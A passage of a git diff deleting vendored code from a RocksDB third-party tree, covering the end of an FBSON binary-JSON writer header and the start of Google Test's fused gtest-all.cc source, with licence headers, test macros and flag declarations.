-      } else {
-        os_->put((FbsonTypeUnder)FbsonType::T_False);
-      }
-
-      kvState_ = WS_Value;
-      return sizeof(FbsonValue);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeInt8(int8_t v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Int8);
-      os_->put(v);
-      kvState_ = WS_Value;
-      return sizeof(Int8Val);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeInt16(int16_t v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Int16);
-      os_->write((char*)&v, sizeof(int16_t));
-      kvState_ = WS_Value;
-      return sizeof(Int16Val);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeInt32(int32_t v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Int32);
-      os_->write((char*)&v, sizeof(int32_t));
-      kvState_ = WS_Value;
-      return sizeof(Int32Val);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeInt64(int64_t v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Int64);
-      os_->write((char*)&v, sizeof(int64_t));
-      kvState_ = WS_Value;
-      return sizeof(Int64Val);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeDouble(double v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Double);
-      os_->write((char*)&v, sizeof(double));
-      kvState_ = WS_Value;
-      return sizeof(DoubleVal);
-    }
-
-    return 0;
-  }
-
-  // must call writeStartString before writing a string val
-  bool writeStartString() {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_String);
-      str_pos_ = os_->tellp();
-
-      // fill the size bytes with 0 for now
-      uint32_t size = 0;
-      os_->write((char*)&size, sizeof(uint32_t));
-
-      kvState_ = WS_String;
-      return true;
-    }
-
-    return false;
-  }
-
-  // finish writing a string val
-  bool writeEndString() {
-    if (kvState_ == WS_String) {
-      std::streampos cur_pos = os_->tellp();
-      int32_t size = (int32_t)(cur_pos - str_pos_ - sizeof(uint32_t));
-      assert(size >= 0);
-
-      os_->seekp(str_pos_);
-      os_->write((char*)&size, sizeof(uint32_t));
-      os_->seekp(cur_pos);
-
-      kvState_ = WS_Value;
-      return true;
-    }
-
-    return false;
-  }
-
-  uint32_t writeString(const char* str, uint32_t len) {
-    if (kvState_ == WS_String) {
-      os_->write(str, len);
-      return len;
-    }
-
-    return 0;
-  }
-
-  uint32_t writeString(char ch) {
-    if (kvState_ == WS_String) {
-      os_->put(ch);
-      return 1;
-    }
-
-    return 0;
-  }
-
-  // must call writeStartBinary before writing a binary val
-  bool writeStartBinary() {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Binary);
-      str_pos_ = os_->tellp();
-
-      // fill the size bytes with 0 for now
-      uint32_t size = 0;
-      os_->write((char*)&size, sizeof(uint32_t));
-
-      kvState_ = WS_Binary;
-      return true;
-    }
-
-    return false;
-  }
-
-  // finish writing a binary val
-  bool writeEndBinary() {
-    if (kvState_ == WS_Binary) {
-      std::streampos cur_pos = os_->tellp();
-      int32_t size = (int32_t)(cur_pos - str_pos_ - sizeof(uint32_t));
-      assert(size >= 0);
-
-      os_->seekp(str_pos_);
-      os_->write((char*)&size, sizeof(uint32_t));
-      os_->seekp(cur_pos);
-
-      kvState_ = WS_Value;
-      return true;
-    }
-
-    return false;
-  }
-
-  uint32_t writeBinary(const char* bin, uint32_t len) {
-    if (kvState_ == WS_Binary) {
-      os_->write(bin, len);
-      return len;
-    }
-
-    return 0;
-  }
-
-  // must call writeStartObject before writing an object val
-  bool writeStartObject() {
-    if (stack_.empty() || verifyValueState()) {
-      if (stack_.empty()) {
-        // if this is a new FBSON, write the header
-        if (!hasHdr_) {
-          writeHeader();
-        } else
-          return false;
-      }
-
-      os_->put((FbsonTypeUnder)FbsonType::T_Object);
-      // save the size position
-      stack_.push(WriteInfo({WS_Object, os_->tellp()}));
-
-      // fill the size bytes with 0 for now
-      uint32_t size = 0;
-      os_->write((char*)&size, sizeof(uint32_t));
-
-      kvState_ = WS_Value;
-      return true;
-    }
-
-    return false;
-  }
-
-  // finish writing an object val
-  bool writeEndObject() {
-    if (!stack_.empty() && stack_.top().state == WS_Object &&
-        kvState_ == WS_Value) {
-      WriteInfo& ci = stack_.top();
-      std::streampos cur_pos = os_->tellp();
-      int32_t size = (int32_t)(cur_pos - ci.sz_pos - sizeof(uint32_t));
-      assert(size >= 0);
-
-      os_->seekp(ci.sz_pos);
-      os_->write((char*)&size, sizeof(uint32_t));
-      os_->seekp(cur_pos);
-      stack_.pop();
-
-      return true;
-    }
-
-    return false;
-  }
-
-  // must call writeStartArray before writing an array val
-  bool writeStartArray() {
-    if (stack_.empty() || verifyValueState()) {
-      if (stack_.empty()) {
-        // if this is a new FBSON, write the header
-        if (!hasHdr_) {
-          writeHeader();
-        } else
-          return false;
-      }
-
-      os_->put((FbsonTypeUnder)FbsonType::T_Array);
-      // save the size position
-      stack_.push(WriteInfo({WS_Array, os_->tellp()}));
-
-      // fill the size bytes with 0 for now
-      uint32_t size = 0;
-      os_->write((char*)&size, sizeof(uint32_t));
-
-      kvState_ = WS_Value;
-      return true;
-    }
-
-    return false;
-  }
-
-  // finish writing an array val
-  bool writeEndArray() {
-    if (!stack_.empty() && stack_.top().state == WS_Array &&
-        kvState_ == WS_Value) {
-      WriteInfo& ci = stack_.top();
-      std::streampos cur_pos = os_->tellp();
-      int32_t size = (int32_t)(cur_pos - ci.sz_pos - sizeof(uint32_t));
-      assert(size >= 0);
-
-      os_->seekp(ci.sz_pos);
-      os_->write((char*)&size, sizeof(uint32_t));
-      os_->seekp(cur_pos);
-      stack_.pop();
-
-      return true;
-    }
-
-    return false;
-  }
-
-  OS_TYPE* getOutput() { return os_; }
-
- private:
-  // verify we are in the right state before writing a value
-  bool verifyValueState() {
-    assert(!stack_.empty());
-    return (stack_.top().state == WS_Object && kvState_ == WS_Key) ||
-           (stack_.top().state == WS_Array && kvState_ == WS_Value);
-  }
-
-  // verify we are in the right state before writing a key
-  bool verifyKeyState() {
-    assert(!stack_.empty());
-    return stack_.top().state == WS_Object && kvState_ == WS_Value;
-  }
-
-  void writeHeader() {
-    os_->put(FBSON_VER);
-    hasHdr_ = true;
-  }
-
- private:
-  enum WriteState {
-    WS_NONE,
-    WS_Array,
-    WS_Object,
-    WS_Key,
-    WS_Value,
-    WS_String,
-    WS_Binary,
-  };
-
-  struct WriteInfo {
-    WriteState state;
-    std::streampos sz_pos;
-  };
-
- private:
-  OS_TYPE* os_;
-  bool alloc_;
-  bool hasHdr_;
-  WriteState kvState_; // key or value state
-  std::streampos str_pos_;
-  std::stack<WriteInfo> stack_;
-};
-
-typedef FbsonWriterT<FbsonOutStream> FbsonWriter;
-
-} // namespace fbson
-
-#endif // FBSON_FBSONWRITER_H
diff --git a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/CMakeLists.txt b/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/CMakeLists.txt
deleted file mode 100644
index 90cff08..0000000
--- a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/CMakeLists.txt
+++ /dev/null
@@ -1 +0,0 @@
-add_library(gtest gtest-all.cc)
diff --git a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest-all.cc b/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest-all.cc
deleted file mode 100644
index 7c52172..0000000
--- a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest-all.cc
+++ /dev/null
@@ -1,10261 +0,0 @@
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: mheule@google.com (Markus Heule)
-//
-// Google C++ Testing Framework (Google Test)
-//
-// Sometimes it's desirable to build Google Test by compiling a single file.
-// This file serves this purpose.
-
-// Suppress clang analyzer warnings.
-#ifndef __clang_analyzer__
-
-// This line ensures that gtest.h can be compiled on its own, even
-// when it's fused.
-#include "gtest/gtest.h"
-
-// The following lines pull in the real gtest *.cc files.
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// The Google C++ Testing Framework (Google Test)
-
-// Copyright 2007, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// Utilities for testing Google Test itself and code that uses Google Test
-// (e.g. frameworks built on top of Google Test).
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_SPI_H_
-#define GTEST_INCLUDE_GTEST_GTEST_SPI_H_
-
-namespace testing {
-
-// This helper class can be used to mock out Google Test failure reporting
-// so that we can test Google Test or code that builds on Google Test.
-//
-// An object of this class appends a TestPartResult object to the
-// TestPartResultArray object given in the constructor whenever a Google Test
-// failure is reported. It can either intercept only failures that are
-// generated in the same thread that created this object or it can intercept
-// all generated failures. The scope of this mock object can be controlled with
-// the second argument to the two arguments constructor.
-class GTEST_API_ ScopedFakeTestPartResultReporter
-    : public TestPartResultReporterInterface {
- public:
-  // The two possible mocking modes of this object.
-  enum InterceptMode {
-    INTERCEPT_ONLY_CURRENT_THREAD,  // Intercepts only thread local failures.
-    INTERCEPT_ALL_THREADS           // Intercepts all failures.
-  };
-
-  // The c'tor sets this object as the test part result reporter used
-  // by Google Test.  The 'result' parameter specifies where to report the
-  // results. This reporter will only catch failures generated in the current
-  // thread. DEPRECATED
-  explicit ScopedFakeTestPartResultReporter(TestPartResultArray* result);
-
-  // Same as above, but you can choose the interception scope of this object.
-  ScopedFakeTestPartResultReporter(InterceptMode intercept_mode,
-                                   TestPartResultArray* result);
-
-  // The d'tor restores the previous test part result reporter.
-  virtual ~ScopedFakeTestPartResultReporter();
-
-  // Appends the TestPartResult object to the TestPartResultArray
-  // received in the constructor.
-  //
-  // This method is from the TestPartResultReporterInterface
-  // interface.
-  virtual void ReportTestPartResult(const TestPartResult& result);
- private:
-  void Init();
-
-  const InterceptMode intercept_mode_;
-  TestPartResultReporterInterface* old_reporter_;
-  TestPartResultArray* const result_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ScopedFakeTestPartResultReporter);
-};
-
-namespace internal {
-
-// A helper class for implementing EXPECT_FATAL_FAILURE() and
-// EXPECT_NONFATAL_FAILURE().  Its destructor verifies that the given
-// TestPartResultArray contains exactly one failure that has the given
-// type and contains the given substring.  If that's not the case, a
-// non-fatal failure will be generated.
-class GTEST_API_ SingleFailureChecker {
- public:
-  // The constructor remembers the arguments.
-  SingleFailureChecker(const TestPartResultArray* results,
-                       TestPartResult::Type type,
-                       const string& substr);
-  ~SingleFailureChecker();
- private:
-  const TestPartResultArray* const results_;
-  const TestPartResult::Type type_;
-  const string substr_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(SingleFailureChecker);
-};
-
-}  // namespace internal
-
-}  // namespace testing
-
-// A set of macros for testing Google Test assertions or code that's expected
-// to generate Google Test fatal failures.  It verifies that the given
-// statement will cause exactly one fatal Google Test failure with 'substr'
-// being part of the failure message.
-//
-// There are two different versions of this macro. EXPECT_FATAL_FAILURE only
-// affects and considers failures generated in the current thread and
-// EXPECT_FATAL_FAILURE_ON_ALL_THREADS does the same but for all threads.
-//
-// The verification of the assertion is done correctly even when the statement
-// throws an exception or aborts the current function.
-//
-// Known restrictions:
-//   - 'statement' cannot reference local non-static variables or
-//     non-static members of the current object.
-//   - 'statement' cannot return a value.
-//   - You cannot stream a failure message to this macro.
-//
-// Note that even though the implementations of the following two
-// macros are much alike, we cannot refactor them to use a common
-// helper macro, due to some peculiarity in how the preprocessor
-// works.  The AcceptsMacroThatExpandsToUnprotectedComma test in
-// gtest_unittest.cc will fail to compile if we do that.
-#define EXPECT_FATAL_FAILURE(statement, substr) \
-  do { \
-    class GTestExpectFatalFailureHelper {\
-     public:\
-      static void Execute() { statement; }\
-    };\
-    ::testing::TestPartResultArray gtest_failures;\
-    ::testing::internal::SingleFailureChecker gtest_checker(\
-        &gtest_failures, ::testing::TestPartResult::kFatalFailure, (substr));\
-    {\
-      ::testing::ScopedFakeTestPartResultReporter gtest_reporter(\
-          ::testing::ScopedFakeTestPartResultReporter:: \
-          INTERCEPT_ONLY_CURRENT_THREAD, &gtest_failures);\
-      GTestExpectFatalFailureHelper::Execute();\
-    }\
-  } while (::testing::internal::AlwaysFalse())
-
-#define EXPECT_FATAL_FAILURE_ON_ALL_THREADS(statement, substr) \
-  do { \
-    class GTestExpectFatalFailureHelper {\
-     public:\
-      static void Execute() { statement; }\
-    };\
-    ::testing::TestPartResultArray gtest_failures;\
-    ::testing::internal::SingleFailureChecker gtest_checker(\
-        &gtest_failures, ::testing::TestPartResult::kFatalFailure, (substr));\
-    {\
-      ::testing::ScopedFakeTestPartResultReporter gtest_reporter(\
-          ::testing::ScopedFakeTestPartResultReporter:: \
-          INTERCEPT_ALL_THREADS, &gtest_failures);\
-      GTestExpectFatalFailureHelper::Execute();\
-    }\
-  } while (::testing::internal::AlwaysFalse())
-
-// A macro for testing Google Test assertions or code that's expected to
-// generate Google Test non-fatal failures.  It asserts that the given
-// statement will cause exactly one non-fatal Google Test failure with 'substr'
-// being part of the failure message.
-//
-// There are two different versions of this macro. EXPECT_NONFATAL_FAILURE only
-// affects and considers failures generated in the current thread and
-// EXPECT_NONFATAL_FAILURE_ON_ALL_THREADS does the same but for all threads.
-//
-// 'statement' is allowed to reference local variables and members of
-// the current object.
-//
-// The verification of the assertion is done correctly even when the statement
-// throws an exception or aborts the current function.
-//
-// Known restrictions:
-//   - You cannot stream a failure message to this macro.
-//
-// Note that even though the implementations of the following two
-// macros are much alike, we cannot refactor them to use a common
-// helper macro, due to some peculiarity in how the preprocessor
-// works.  If we do that, the code won't compile when the user gives
-// EXPECT_NONFATAL_FAILURE() a statement that contains a macro that
-// expands to code containing an unprotected comma.  The
-// AcceptsMacroThatExpandsToUnprotectedComma test in gtest_unittest.cc
-// catches that.
-//
-// For the same reason, we have to write
-//   if (::testing::internal::AlwaysTrue()) { statement; }
-// instead of
-//   GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement)
-// to avoid an MSVC warning on unreachable code.
-#define EXPECT_NONFATAL_FAILURE(statement, substr) \
-  do {\
-    ::testing::TestPartResultArray gtest_failures;\
-    ::testing::internal::SingleFailureChecker gtest_checker(\
-        &gtest_failures, ::testing::TestPartResult::kNonFatalFailure, \
-        (substr));\
-    {\
-      ::testing::ScopedFakeTestPartResultReporter gtest_reporter(\
-          ::testing::ScopedFakeTestPartResultReporter:: \
-          INTERCEPT_ONLY_CURRENT_THREAD, &gtest_failures);\
-      if (::testing::internal::AlwaysTrue()) { statement; }\
-    }\
-  } while (::testing::internal::AlwaysFalse())
-
-#define EXPECT_NONFATAL_FAILURE_ON_ALL_THREADS(statement, substr) \
-  do {\
-    ::testing::TestPartResultArray gtest_failures;\
-    ::testing::internal::SingleFailureChecker gtest_checker(\
-        &gtest_failures, ::testing::TestPartResult::kNonFatalFailure, \
-        (substr));\
-    {\
-      ::testing::ScopedFakeTestPartResultReporter gtest_reporter(\
-          ::testing::ScopedFakeTestPartResultReporter::INTERCEPT_ALL_THREADS, \
-          &gtest_failures);\
-      if (::testing::internal::AlwaysTrue()) { statement; }\
-    }\
-  } while (::testing::internal::AlwaysFalse())
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_SPI_H_
-
-#include <ctype.h>
-#include <math.h>
-#include <stdarg.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <time.h>
-#include <wchar.h>
-#include <wctype.h>
-
-#include <algorithm>
-#include <iomanip>
-#include <limits>
-#include <list>
-#include <map>
-#include <ostream>  // NOLINT
-#include <sstream>
-#include <vector>
-
-#if GTEST_OS_LINUX
-
-// TODO(kenton@google.com): Use autoconf to detect availability of
-// gettimeofday().
-# define GTEST_HAS_GETTIMEOFDAY_ 1
-
-# include <fcntl.h>  // NOLINT
-# include <limits.h>  // NOLINT
-# include <sched.h>  // NOLINT
-// Declares vsnprintf().  This header is not available on Windows.
-# include <strings.h>  // NOLINT
-# include <sys/mman.h>  // NOLINT
-# include <sys/time.h>  // NOLINT
-# include <unistd.h>  // NOLINT
-# include <string>
-
-#elif GTEST_OS_SYMBIAN
-# define GTEST_HAS_GETTIMEOFDAY_ 1
-# include <sys/time.h>  // NOLINT
-
-#elif GTEST_OS_ZOS
-# define GTEST_HAS_GETTIMEOFDAY_ 1
-# include <sys/time.h>  // NOLINT
-
-// On z/OS we additionally need strings.h for strcasecmp.
-# include <strings.h>  // NOLINT
-
-#elif GTEST_OS_WINDOWS_MOBILE  // We are on Windows CE.
-
-# include <windows.h>  // NOLINT
-# undef min
-
-#elif GTEST_OS_WINDOWS  // We are on Windows proper.
-
-# include <io.h>  // NOLINT
-# include <sys/timeb.h>  // NOLINT
-# include <sys/types.h>  // NOLINT
-# include <sys/stat.h>  // NOLINT
-
-# if GTEST_OS_WINDOWS_MINGW
-// MinGW has gettimeofday() but not _ftime64().
-// TODO(kenton@google.com): Use autoconf to detect availability of
-//   gettimeofday().
-// TODO(kenton@google.com): There are other ways to get the time on
-//   Windows, like GetTickCount() or GetSystemTimeAsFileTime().  MinGW
-//   supports these.  consider using them instead.
-#  define GTEST_HAS_GETTIMEOFDAY_ 1
-#  include <sys/time.h>  // NOLINT
-# endif  // GTEST_OS_WINDOWS_MINGW
-
-// cpplint thinks that the header is already included, so we want to
-// silence it.
-# include <windows.h>  // NOLINT
-# undef min
-
-#else
-
-// Assume other platforms have gettimeofday().
-// TODO(kenton@google.com): Use autoconf to detect availability of
-//   gettimeofday().
-# define GTEST_HAS_GETTIMEOFDAY_ 1
-
-// cpplint thinks that the header is already included, so we want to
-// silence it.
-# include <sys/time.h>  // NOLINT
-# include <unistd.h>  // NOLINT
-
-#endif  // GTEST_OS_LINUX
-
-#if GTEST_HAS_EXCEPTIONS
-# include <stdexcept>
-#endif
-
-#if GTEST_CAN_STREAM_RESULTS_
-# include <arpa/inet.h>  // NOLINT
-# include <netdb.h>  // NOLINT
-# include <sys/socket.h>  // NOLINT
-# include <sys/types.h>  // NOLINT
-#endif
-
-// Indicates that this translation unit is part of Google Test's
-// implementation.  It must come before gtest-internal-inl.h is
-// included, or there will be a compiler error.  This trick is to
-// prevent a user from accidentally including gtest-internal-inl.h in
-// his code.
-#define GTEST_IMPLEMENTATION_ 1
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-// Utility functions and classes used by the Google C++ testing framework.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// This file contains purely Google Test's internal implementation.  Please
-// DO NOT #INCLUDE IT IN A USER PROGRAM.
-
-#ifndef GTEST_SRC_GTEST_INTERNAL_INL_H_
-#define GTEST_SRC_GTEST_INTERNAL_INL_H_
-
-// GTEST_IMPLEMENTATION_ is defined to 1 iff the current translation unit is
-// part of Google Test's implementation; otherwise it's undefined.
-#if !GTEST_IMPLEMENTATION_
-// If this file is included from the user's code, just say no.
-# error "gtest-internal-inl.h is part of Google Test's internal implementation."
-# error "It must not be included except by Google Test itself."
-#endif  // GTEST_IMPLEMENTATION_
-
-#ifndef _WIN32_WCE
-# include <errno.h>
-#endif  // !_WIN32_WCE
-#include <stddef.h>
-#include <stdlib.h>  // For strtoll/_strtoul64/malloc/free.
-#include <string.h>  // For memmove.
-
-#include <algorithm>
-#include <string>
-#include <vector>
-
-
-#if GTEST_CAN_STREAM_RESULTS_
-# include <arpa/inet.h>  // NOLINT
-# include <netdb.h>  // NOLINT
-#endif
-
-#if GTEST_OS_WINDOWS
-# include <windows.h>  // NOLINT
-#endif  // GTEST_OS_WINDOWS
-
-
-namespace testing {
-
-// Declares the flags.
-//
-// We don't want the users to modify this flag in the code, but want
-// Google Test's own unit tests to be able to access it. Therefore we
-// declare it here as opposed to in gtest.h.
-GTEST_DECLARE_bool_(death_test_use_fork);
-
-namespace internal {
-
-// The value of GetTestTypeId() as seen from within the Google Test
-// library.  This is solely for testing GetTestTypeId().
-GTEST_API_ extern const TypeId kTestTypeIdInGoogleTest;
-
-// Names of the flags (needed for parsing Google Test flags).
-const char kAlsoRunDisabledTestsFlag[] = "also_run_disabled_tests";
-const char kBreakOnFailureFlag[] = "break_on_failure";
-const char kCatchExceptionsFlag[] = "catch_exceptions";
-const char kColorFlag[] = "color";
-const char kFilterFlag[] = "filter";
-const char kListTestsFlag[] = "list_tests";
-const char kOutputFlag[] = "output";
-const char kPrintTimeFlag[] = "print_time";
-const char kRandomSeedFlag[] = "random_seed";
-const char kRepeatFlag[] = "repeat";
-const char kShuffleFlag[] = "shuffle";
-const char kStackTraceDepthFlag[] = "stack_trace_depth";
-const char kStreamResultToFlag[] = "stream_result_to";
-const char kThrowOnFailureFlag[] = "throw_on_failure";
-
-// A valid random seed must be in [1, kMaxRandomSeed].
-const int kMaxRandomSeed = 99999;
-
-// g_help_flag is true iff the --help flag or an equivalent form is
-// specified on the command line.
-GTEST_API_ extern bool g_help_flag;
-
-// Returns the current time in milliseconds.
-GTEST_API_ TimeInMillis GetTimeInMillis();
-
-// Returns true iff Google Test should use colors in the output.
-GTEST_API_ bool ShouldUseColor(bool stdout_is_tty);
-
-// Formats the given time in milliseconds as seconds.
-GTEST_API_ std::string FormatTimeInMillisAsSeconds(TimeInMillis ms);
-
-// Converts the given time in milliseconds to a date string in the ISO 8601
-// format, without the timezone information.  N.B.: due to the use the
-// non-reentrant localtime() function, this function is not thread safe.  Do
-// not use it in any code that can be called from multiple threads.
-GTEST_API_ std::string FormatEpochTimeInMillisAsIso8601(TimeInMillis ms);
-
-// Parses a string for an Int32 flag, in the form of "--flag=value".
-//
-// On success, stores the value of the flag in *value, and returns
-// true.  On failure, returns false without changing *value.
-GTEST_API_ bool ParseInt32Flag(
-    const char* str, const char* flag, Int32* value);
-
-// Returns a random seed in range [1, kMaxRandomSeed] based on the
-// given --gtest_random_seed flag value.
-inline int GetRandomSeedFromFlag(Int32 random_seed_flag) {
-  const unsigned int raw_seed = (random_seed_flag == 0) ?
-      static_cast<unsigned int>(GetTimeInMillis()) :
-      static_cast<unsigned int>(random_seed_flag);
-
-  // Normalizes the actual seed to range [1, kMaxRandomSeed] such that
-  // it's easy to type.
-  const int normalized_seed =
-      static_cast<int>((raw_seed - 1U) %
-                       static_cast<unsigned int>(kMaxRandomSeed)) + 1;
-  return normalized_seed;
-}
-
-// Returns the first valid random seed after 'seed'.  The behavior is
-// undefined if 'seed' is invalid.  The seed after kMaxRandomSeed is
-// considered to be 1.
-inline int GetNextRandomSeed(int seed) {
-  GTEST_CHECK_(1 <= seed && seed <= kMaxRandomSeed)
-      << "Invalid random seed " << seed << " - must be in [1, "
-      << kMaxRandomSeed << "].";
-  const int next_seed = seed + 1;
-  return (next_seed > kMaxRandomSeed) ? 1 : next_seed;
-}
-
-// This class saves the values of all Google Test flags in its c'tor, and
-// restores them in its d'tor.
-class GTestFlagSaver {
- public:
-  // The c'tor.
-  GTestFlagSaver() {
-    also_run_disabled_tests_ = GTEST_FLAG(also_run_disabled_tests);
-    break_on_failure_ = GTEST_FLAG(break_on_failure);
-    catch_exceptions_ = GTEST_FLAG(catch_exceptions);
-    color_ = GTEST_FLAG(color);
-    death_test_style_ = GTEST_FLAG(death_test_style);
-    death_test_use_fork_ = GTEST_FLAG(death_test_use_fork);
-    filter_ = GTEST_FLAG(filter);
-    internal_run_death_test_ = GTEST_FLAG(internal_run_death_test);
